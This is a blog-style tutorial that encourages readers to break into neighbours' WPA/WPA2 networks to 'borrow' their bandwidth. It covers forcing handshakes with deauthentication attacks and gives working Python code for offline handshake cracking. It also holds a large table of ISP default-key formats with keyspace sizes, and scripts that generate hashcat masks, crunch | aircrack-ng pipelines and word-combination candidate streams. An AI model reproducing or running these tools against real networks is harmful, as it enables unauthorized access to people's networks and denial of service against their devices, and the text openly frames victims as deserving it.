Once upon a time, the internet was fast. Then the ISPs worked out that most people will never notice, and started throttling download and upload speeds (downstream/upstream). Fight back by stealing wifi! If people are careless enough to leave the default password on their router, they deserve it.

You will find that during certain hours your internet "slows down significantly". This is what is termed the "internet rush hour": at peak times the ISP applies traffic management and caps your connection. Rather than explain how to hack the router itself (UNLIMITED POWER!), I'll show you how to "borrow" from your neighbours and add their bandwidth to your own.

Demystifying how to hack wifi

There are two methods. The first is to attack the router directly and guess the password online, one connection attempt at a time, from a wordlist. Every guess costs a full association and handshake, so it is slow and noisy, and if you go via WPS the router locks you out after a handful of failed PINs, sometimes indefinitely. This route is not worth it.

The other method is to listen for the "handshake" and crack it offline. The handshake is the four-way exchange your device does with the router when it connects under WPA/WPA2. The password itself is never sent, encrypted or otherwise: both sides derive a key from the password and the network name, exchange random nonces, and each side proves it holds that key by attaching a MIC (a keyed hash) to its handshake messages. Anyone who captures the two MAC addresses, the two nonces and one of those MICs can test candidate passwords offline, recomputing the MIC for each guess until one matches. Anyone with a clue would ask "Ah, but doesn't that mean you have to WAIT for a device to connect?" Well, we can force it: send deauthentication frames to a connected client, it drops off and reconnects, and you get a fresh handshake. That is a DoS (Denial of Service, which could well be illegal), and it needs an adapter that supports monitor mode and packet injection, so buy a cheap wifi dongle JUST for this. aireplay-ng from the Aircrack-ng suite or mdk3/mdk4 do the deauth; airodump-ng is what records the capture file containing the handshake, which you then crack. (AirSnort is a WEP-only tool and is no use here.) For the cracking we need to narrow down what the password is likely to look like, otherwise we could be at it forever. The best method is to work out from the SSID which ISP or router model it is, and attack the default password format.
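Here is what "crack the handshake" actually means, as an added example (mine, not from the original post and not Aircrack-ng's or hashcat's code): the 802.11i derivation those tools perform for every guess. PBKDF2-HMAC-SHA1 turns passphrase and SSID into the PMK; the PRF expands the PMK with both MAC addresses and both nonces into the PTK; the first 16 bytes of the PTK (the KCK) key an HMAC-SHA1 over the EAPOL-Key frame; the truncated result is the MIC that was captured. The network name, MAC addresses, nonces and EAPOL frame below are constructed, not from a real capture; the only real vector is the "password"/"IEEE" PBKDF2 test value from the 802.11i test-vector annex, which the PMK step can be checked against.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i passphrase-to-PSK mapping: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes.
    The 4096 rounds are the whole reason WPA2 cracking is slow per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


@dataclass(frozen=True)
class Handshake:
    ssid: str
    ap_mac: bytes      # authenticator address (BSSID)
    sta_mac: bytes     # supplicant address
    anonce: bytes      # 32-byte nonce from message 1
    snonce: bytes      # 32-byte nonce from message 2
    eapol: bytes       # EAPOL-Key frame of message 2 with its 16-byte MIC field zeroed
    mic: bytes         # the MIC as it appeared on the air


def kck(pmk: bytes, hs: Handshake) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN));
    its first 16 bytes are the Key Confirmation Key that authenticates the EAPOL frames."""
    data = (min(hs.ap_mac, hs.sta_mac) + max(hs.ap_mac, hs.sta_mac)
            + min(hs.anonce, hs.snonce) + max(hs.anonce, hs.snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def expected_mic(pmk: bytes, hs: Handshake) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, EAPOL frame)[:16]."""
    return hmac.new(kck(pmk, hs), hs.eapol, hashlib.sha1).digest()[:16]


def passphrase_matches(candidate: str, hs: Handshake) -> bool:
    return hmac.compare_digest(expected_mic(pmk_from_passphrase(candidate, hs.ssid), hs), hs.mic)


def crack(hs: Handshake, candidates: Iterable[str]) -> Optional[str]:
    """The offline attack: recompute the MIC for each guess and stop at the first match."""
    for candidate in candidates:
        if passphrase_matches(candidate, hs):
            return candidate
    return None


def build_sample_handshake(passphrase: str = "2a3b4c5d6e") -> Handshake:
    """Constructed sample (not a real capture): a BTHub3-style network whose key is 10 chars of 2-9a-f."""
    ssid = "BTHub3-TEST"
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"constructed anonce").digest()   # stand-ins for the random nonces
    snonce = hashlib.sha256(b"constructed snonce").digest()
    eapol = (b"\x01\x03\x00\x5f"                        # EAPOL v1, type Key, 95-byte body
             b"\x02"                                     # descriptor type RSN
             b"\x01\x0a"                                 # key info: version 2 (HMAC-SHA1), pairwise, MIC set
             b"\x00\x10"                                 # key length 16
             b"\x00\x00\x00\x00\x00\x00\x00\x01"         # replay counter
             + snonce + bytes(16) + bytes(8) + bytes(8)  # key nonce, IV, RSC, ID
             + bytes(16)                                 # MIC field, zeroed before hashing
             + b"\x00\x00")                              # key data length 0
    unsigned = Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, b"")
    mic = expected_mic(pmk_from_passphrase(passphrase, ssid), unsigned)
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, mic)


if __name__ == "__main__":
    hs = build_sample_handshake()
    # A handful of constructed guesses from the BTHub3 keyspace; a real run streams millions.
    guesses = ["23456789ab", "2a3b4c5d6f", "2a3b4c5d6e", "fedcba9876"]
    print("recovered passphrase:", crack(hs, guesses))
```

The PBKDF2 step dominates the cost, which is why the rate you get is thousands of guesses per second per CPU core rather than millions, and why the keyspace table below matters so much.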

Below is a list of the default key formats various ISPs around the world use. I lifted this list from another website. Combinations is the size of the character set raised to the number of unknown characters; Time is how long it takes to try them all at roughly 160,000 guesses a second, which is the rate the original figures imply (10^10 keys in 17 hours), so scale it to your own hardware. At the end I will try to add notes on the ones I've played with myself, including my own ISP (who stole hundreds from me, so fuck them too).

| SSID | Length | Password format | Combinations | Time |
|------|--------|-----------------|--------------|------|
| 2WIREXXX | 10 | 0-9 | 10,000,000,000 | 17 hrs |
| 3MobileWiFi | 8 | 0-9 a-z | 2,821,109,907,456 | 7 mth |
| 3Wireless-Modem-XXXX | 8 | 0-9 A-F; the first 4 digits are the same as the 4 digits in the SSID | 65,536 | 1 sec |
| Alice_XXXXXXXX | 24 | 0-9 a-z | 22,452,257,707,354,557,240,087,211,123,792,674,816 | Never |
| AOLBB-XXXXXX | 8 | 0-9 A-Z | 2,821,109,907,456 | 7 mth |
| ATT### | 10 | 0-9 | 10,000,000,000 | 17 hrs |
| ATTxxxx 0000 | 10 | 0-9 A-Z | 3,656,158,440,062,976 | Never |
| ATTxxxxxxx | 12 | a-z + symbols | 1,449,225,352,009,601,191,936 | Never |
| belkin.xxx | 8 | 2-9 a-f | 1,475,789,056 | 2.5 hrs |
| belkin.xxxx | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs |
| Belkin.XXXX | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs |
| Belkin_XXXXXX | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs |
| BigPondXXXXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| BOLT!SUPER 4G-XXXX | 8 | 4 digits + last 4 of the SSID | 10,000 | 1 sec |
| BrightBox-XXXXXX | - | 3 words with hyphens in between, each word 3, 4 or 5 letters, in any combination | depends on dictionary | Need dict. |
| BTHomeHub(1)-XXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth |
| BTHomeHub2-XXXX | 10 | 2-9 a-f | 289,254,654,976 | 3 wks |
| BTHub3 | 10 | 2-9 a-f | 289,254,654,976 | 3 wks |
| BTHub4 | 10 | 2-9 a-f | 289,254,654,976 | 3 wks |
| BTHub5 | 10 | 2-9 a-f | 289,254,654,976 | 3 wks |
| BTHub6 | 10 or 12 | 0-9 a-z A-Z | 839,299,365,868,340,224 (10) / 3,226,266,762,397,899,821,056 (12) | Never |
| CenturyLinkXXXX | 14 | 0-9 a-f | 72,057,594,037,927,936 | Never |
| Cisco | 26 | 0-9 a-f | 20,282,409,603,651,670,423,947,251,286,016 | Never |
| Digicom_XXXX | 8 | 0-9 A-Z | 2,821,109,907,456 | 7 mth |
| DJAWEB_##### | 10 | 0-9 | 10,000,000,000 | 17 hrs |
| Domino-XXXX | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs |
| E583x-xxxx | 8 | 0-9 | 100,000,000 | 10 min |
| E583x-xxxxx | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs |
| EasyBox 904 LTE | 9 | 0-9 a-z A-Z | 13,537,086,546,263,552 | Never |
| EasyBox-###### | 9 | 0-9 A-F | 68,719,476,736 | 5 days |
| EEBrightBox-XXXXXX | - | 3 words with hyphens in between, each word 3, 4 or 5 letters, in any combination | depends on dictionary | Need dict. |
| FRITZ!Box Fon WLAN #### | 16 | 0-9 | 10,000,000,000,000,000 | Never |
| FrontierXXXX | 10 | 0-9 | 10,000,000,000 | 17 hrs |
| Hitron | 12 | 0-9 A-Z (sometimes the device's serial number is the default key) | 4,738,381,338,321,616,896 | Never |
| INFINITUM#### | 10 | 0-9 | 10,000,000,000 | 17 hrs |
| iPhone 5 | ? | lowercase word + 4 digits | 172,000 x 10,000 (for a 172,000-word dictionary) | Need dict. |
| Keenetic-XXXX | 8 | 0-9 a-z A-Z | 218,340,105,584,896 | Never |
| Linkem_XXXXXX | 8 | 0-9 | 100,000,000 | 10 min |
| Livebox-XXXX | ? | ? | ? | ? |
| mifi2 | 13 | 0-9 A-Z | 170,581,728,179,578,208,256 | Never |
| MobileWifi-xxxx | 8 | 0-9 | 100,000,000 | 10 min |
| MYWIFI (EE) | - | MYWIFI + 4 digits | 10,000 | 1 sec |
| NETGEARXX | - | adjective + noun + 3 digits | depends on dictionary | Need dict. |
| Netia-XXXXXX | 13 | 0-9 a-f | 4,503,599,627,370,496 | Never |
| ONOXXXX | 10 | 0-9 | 10,000,000,000 | 17 hrs |
| Orange-0a0aa0 | 8 | 0-9 a-f | 4,294,967,296 | 7.5 hrs |
| Orange-AA0A00 | 12 | 0-9 A-F | 281,474,976,710,656 | Never |
| Orange-XXXX | 8 | 2345679 ACEF | 214,358,881 | 23 mins |
| PLDT | - | PLDTWIFI + last 5 digits of the router MAC | 1 | 1 sec |
| Plusnet Broadband UK | 64 | a-z A-Z 0-9 | - | Never |
| PlusnetWireless-XXXXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| PLUSNET-XXXXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth |
| Sitecom_XXXX | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs |
| SKYXXXXX | 8 | A-Z (see http://www.ph-mb.com/products/sky-calc) | 208,827,064,576 | 15 days |
| SpeedTouchXXXXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth |
| TALKTALK-XXXXXX | 8 | 346789 A-Z (bar I L O S Z) | 282,429,536,481 | 3 wks |
| TDC-#### | 9 | 0-9 a-f | 68,719,476,736 | 5 days |
| Tech_XXXXXXXX | 8 | A-Z | 208,827,064,576 | 15 days |
| Technicolor-Router | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| Telecom-XXXXXXXX | ? | ? | ? | ? |
| TelstraXXXXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| TELUSXXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth |
| Thomson | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| ThomsonXXXXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth |
| TIM_PN51T_XXXX | 8 | 0-9 (the WPS PIN is 12345670) | 100,000,000 | 10 min |
| TNCAP-XXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| TNCAPXXXXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| TP-LINK_###### | 8 | 0-9 (some models 0-9 A-F) | 100,000,000 (4,294,967,296 for hex) | 10 min (7.5 hrs for hex) |
| TRENDnet TEW-123ABC | 11 | first 3 digits of the SSID (123 here) + 8 more characters; the listed count is 36^8, not 10^8. See https://forums.kali.org/showthread.php?26366-TRENDnet-WPA-disclosure-amp-dictionaries | 2,821,109,907,456 | 7 mth |
| TRKASHI-###### | 8 | 2 digits + 6 letters (the source's own count formula was garbled; 10^2 x 26^6) | 30,891,577,600 | 2 days |
| UNITE-XXXX | 8 | 0-9 | 100,000,000 | 10 min |
| UPCXXXXXXX | 8 | A-Z | 208,827,064,576 | 15 days |
| Verizon MIFIXXXX XXXX | 11 | 0-9 | 100,000,000,000 | 7.5 days |
| virginmediaXXXXXX | 8 | a-z (bar i o l) | 78,310,985,281 | 6 days |
| VirginMobile MiFiXXXX XXX | 11 | 0-9 | 100,000,000,000 | 7.5 days |
| VMXXXXXXX | 12 | 0-9 a-z A-Z | 3,226,266,762,397,899,821,056 | Never |
| VMXXXXXXX-2G | 8 | a-z (bar i o l) | 78,310,985,281 | 6 days |
| VMXXXXXXX-5G | 8 | a-z (bar i o l) | 78,310,985,281 | 6 days |
| Vodaphone_XXXXXXXX | 15 | 0-9 a-z | 221,073,919,720,733,357,899,776 | Never |
| WLAN1-XXXXXX | 11 | 0-9 A-F | 17,592,186,044,416 | Never |
| ZyXELXXXXXX | 13 or 10 | 0-9 A-Z (13) or 0-9 A-F (10) | 170,581,728,179,578,208,256 (13) / 1,099,511,627,776 (10) | Never (13) / 2.5 mth (10) |

Note that WPA/WPA2 passphrases are at least 8 characters, so the 8-digit formats are 10^8 candidates, not 10^7 as the original list had them.



The first tool you'll want is Aircrack-ng, a suite of tools for putting your card into monitor mode (airmon-ng), sniffing wifi traffic for handshakes (airodump-ng), knocking clients off so they re-handshake (aireplay-ng) and cracking the result (aircrack-ng). This is what grabs the capture containing the handshake. There are many tutorials on this online, so I do not need to go over it here.

For the cracking itself I will point to a tool that comes highly recommended for those interested in this kind of thing: Hashcat, which is great, I'm told. I have only dabbled with it (I have my own faster tools) and it's just not for me, but it is the right choice for most people.

Cracking the file

This part DOES depend on the default list above. Some ISPs use passwords of only 8 decimal digits, which is 10^8 candidates and a few minutes of work on any modern system, no wordlist needed: brute-force the character set directly. For the 10-character-and-up hex and alphanumeric formats, generate the candidates on the fly with a mask tool (crunch is the go-to, or hashcat's own mask mode) rather than storing them, and the formats built from actual words need a dictionary.

If you are using crunch to generate candidates and feed them straight into aircrack-ng, then on a Linux console the command would be (the "-w -" tells aircrack-ng to read the wordlist from stdin):

crunch <min> <max> <charset> [options] | aircrack-ng -b <BSSID> -w - <capture.cap>

If you are going down the wordlist route, then Hashcat is your better option. Its site even has a converter (cap2hashcat) that turns your captured .cap file into the hash format hashcat wants (mode 22000), along with a forum that explains how to use it.
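The Combinations and Time columns in the table above are nothing more than charset size to the power of the unknown positions, divided by a guess rate, and the table's own numbers imply roughly 160,000 guesses a second (10^10 in 17 hours). The script below is an added example (mine, not from the original post and not from crunch's, aircrack-ng's or hashcat's documentation) that reproduces those two columns from the table's charset shorthand and then turns a row into either a hashcat mask attack or a crunch | aircrack-ng pipeline like the one above. The BSSID, the file names and the "1A2B" known prefix are placeholders, and the rate constant is the one the table implies, not a measurement.

```python
import string
from dataclasses import dataclass
from typing import List, Optional

# ~160,000 guesses/second: the rate the table's own figures imply (10^10 digit-only keys in 17 hours).
# Replace with your own benchmark; a modern GPU running hashcat -m 22000 is far faster than this.
IMPLIED_RATE = 10**10 / (17 * 3600)


@dataclass
class KeyFormat:
    ssid: str
    length: int
    charset: str      # literal characters allowed in each unknown position
    fixed: int = 0    # positions already known from the SSID or MAC, which need no guessing


def expand(spec: str) -> str:
    """Turn the table's shorthand ('2-9 a-f', '346789 A-Z bar ILOSZ') into a literal charset string."""
    excluded = ""
    if " bar " in spec:
        spec, excluded = spec.split(" bar ", 1)
    chars = set()
    for token in spec.split():
        if len(token) == 3 and token[1] == "-":          # a range such as 2-9 or A-F
            chars.update(chr(c) for c in range(ord(token[0]), ord(token[2]) + 1))
        else:                                            # an explicit list such as 346789
            chars.update(token)
    chars.difference_update(excluded.replace(" ", ""))   # e.g. TalkTalk never uses I, L, O, S, Z
    return "".join(sorted(chars))


def combinations(fmt: KeyFormat) -> int:
    return len(fmt.charset) ** (fmt.length - fmt.fixed)


def seconds_to_exhaust(fmt: KeyFormat, rate: float = IMPLIED_RATE) -> float:
    return combinations(fmt) / rate


def human_time(seconds: float) -> str:
    """Same granularity as the table's Time column; anything past a thousand years is 'Never'."""
    if seconds < 60:
        return f"{seconds:.0f} sec"
    if seconds < 3600:
        return f"{seconds / 60:.0f} min"
    if seconds < 86400:
        return f"{seconds / 3600:.1f} hrs"
    if seconds < 30 * 86400:
        return f"{seconds / 86400:.1f} days"
    if seconds < 365 * 86400:
        return f"{seconds / (30 * 86400):.1f} mth"
    if seconds < 1000 * 365 * 86400:
        return f"{seconds / (365 * 86400):.0f} yrs"
    return "Never"


def hashcat_mask(fmt: KeyFormat, known_prefix: str = "") -> List[str]:
    """Arguments for hashcat -a 3: a built-in charset (?d ?l ?u ?h ?H) where one fits exactly,
    otherwise a custom charset via -1. Known characters (e.g. copied from the SSID) go in literally;
    a literal '?' in the prefix would have to be written '??'."""
    builtin = {
        string.digits: "?d", string.ascii_lowercase: "?l", string.ascii_uppercase: "?u",
        string.digits + "abcdef": "?h", string.digits + "ABCDEF": "?H",
    }
    free = fmt.length - fmt.fixed
    if fmt.charset in builtin:
        return [known_prefix + builtin[fmt.charset] * free]
    return ["-1", fmt.charset, known_prefix + "?1" * free]


def hashcat_command(fmt: KeyFormat, hash_file: str = "capture.22000", known_prefix: str = "") -> str:
    # -m 22000 is hashcat's WPA-PBKDF2-PMKID+EAPOL mode, the format cap2hashcat produces.
    return " ".join(["hashcat", "-m", "22000", "-a", "3", hash_file] + hashcat_mask(fmt, known_prefix))


def crunch_pipeline(fmt: KeyFormat, bssid: str = "00:11:22:33:44:55",
                    cap: str = "capture-01.cap") -> Optional[str]:
    # Only a plain charset is expressed here; formats with known positions are left to the hashcat mask.
    if fmt.fixed:
        return None
    return f"crunch {fmt.length} {fmt.length} {fmt.charset} | aircrack-ng -b {bssid} -w - {cap}"


if __name__ == "__main__":
    rows = [
        KeyFormat("2WIREXXX", 10, expand("0-9")),
        KeyFormat("BTHub3", 10, expand("2-9 a-f")),
        KeyFormat("TALKTALK-XXXXXX", 8, expand("346789 A-Z bar ILOSZ")),
        KeyFormat("3Wireless-Modem-XXXX", 8, expand("0-9 A-F"), fixed=4),   # first 4 hex digits from SSID
    ]
    for fmt in rows:
        print(f"{fmt.ssid:22} {combinations(fmt):>22,} {human_time(seconds_to_exhaust(fmt)):>10}")
        print("   ", hashcat_command(fmt, known_prefix="1A2B" if fmt.fixed else ""))
        if crunch_pipeline(fmt):
            print("   ", crunch_pipeline(fmt))
```

The point of the fixed-position handling is the 3Wireless-Modem row: once four of the eight hex digits are read off the SSID, the attack is 16^4 guesses rather than 16^8, and the mask encodes that directly instead of wasting time on a keyspace you already know most of.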

Now I have to bring up an old tool that I've used a few times, which is John the Ripper. Openwall links to many pregenerated wordlists that cover the more "obscure" word-based defaults listed above. These are trivial to locate online these days and will be MUCH faster than brute-forcing the equivalent keyspace. If you are compiling JtR yourself, I would recommend reading my optimising article on this site first; speed is always a bonus.

Once you have your pregenerated wordlists, you'll need a way to combine them into an attack (two or three words joined together, a word plus digits, and so on). This is where a utility such as Hashcat, with its combinator and hybrid modes, could be of use if you don't have your own tools. A quick guide on how it's done can be found here.
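For the word-based defaults above (BrightBox's three hyphenated words, NETGEAR's adjective + noun + 3 digits, the iPhone's word + 4 digits) the "combining" step is a Cartesian product over one word list per slot, streamed into the cracker rather than written out first. This is an added example, mine and not from the original post nor from Hashcat or John the Ripper; the word lists are tiny constructed stand-ins for the real ones, and the BrightBox pattern is read as "each of the three words is 3, 4 or 5 letters", which covers the "3-4-5 or any combination" wording in every order.

```python
import itertools
import math
import sys
from typing import Iterator, Sequence

# Constructed mini-dictionaries standing in for the real word lists linked below.
WORDS = ["sun", "cat", "tree", "blue", "river", "stone", "happy", "quick"]
ADJECTIVES = ["happy", "quick", "blue"]
NOUNS = ["river", "stone", "cat"]


def wpa_valid(candidate: str) -> bool:
    """WPA/WPA2 passphrases are 8-63 printable ASCII characters; anything else is never the key,
    so skip it before paying for the PBKDF2 work."""
    return 8 <= len(candidate) <= 63 and all(32 <= ord(c) <= 126 for c in candidate)


def combine(parts: Sequence[Sequence[str]], sep: str = "") -> Iterator[str]:
    """Cartesian product of the word lists for each slot, joined with sep: the generic pattern attack."""
    for combo in itertools.product(*parts):
        candidate = sep.join(combo)
        if wpa_valid(candidate):
            yield candidate


def combine_count(parts: Sequence[Sequence[str]]) -> int:
    """Upper bound on the candidates combine() yields (before the WPA length filter)."""
    return math.prod(len(p) for p in parts)


def brightbox_candidates(words: Sequence[str]) -> Iterator[str]:
    """BrightBox / EEBrightBox: three hyphen-separated words, each 3, 4 or 5 letters long."""
    pool = [w for w in words if 3 <= len(w) <= 5]
    return combine([pool, pool, pool], sep="-")


def netgear_candidates(adjectives: Sequence[str], nouns: Sequence[str]) -> Iterator[str]:
    """NETGEARXX: adjective + noun + 3 digits (zero-padded, so 000-999)."""
    digits = [f"{d:03d}" for d in range(1000)]
    return combine([adjectives, nouns, digits])


def word_plus_digits_candidates(words: Sequence[str], ndigits: int = 4) -> Iterator[str]:
    """iPhone-hotspot style: a lowercase word followed by ndigits digits. Short words fall out
    of the WPA filter automatically (a 3-letter word + 4 digits is only 7 characters)."""
    digits = [str(d).zfill(ndigits) for d in range(10 ** ndigits)]
    return combine([[w.lower() for w in words], digits])


if __name__ == "__main__":
    # Streaming to stdout is the point: pipe this into `aircrack-ng -b <BSSID> -w - capture.cap`
    # (or hashcat's stdin mode) instead of writing gigabytes of wordlist to disk first.
    pool = [w for w in WORDS if 3 <= len(w) <= 5]
    sys.stderr.write(f"brightbox candidates: {combine_count([pool, pool, pool])}\n")
    for candidate in itertools.chain(brightbox_candidates(WORDS), netgear_candidates(ADJECTIVES, NOUNS)):
        sys.stdout.write(candidate + "\n")
```

With a real dictionary the counts tell you whether the attack is viable before you start: a 2,000-word pool gives 2,000^3 = 8 billion BrightBox candidates, which is weeks at the table's rate, whereas a few hundred adjectives and nouns times 1,000 digits for the NETGEAR pattern is minutes.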

I have uploaded a list of full English words of length 3, 4 and 5, which you can reuse for several of the word-based formats above, a general list of English words here, and a list of all combinations of 0-9 a-f (lower hex) here, split into 1 GB files inside a 7zip archive.

Enjoy and Hail Chaos
The_Original_Sin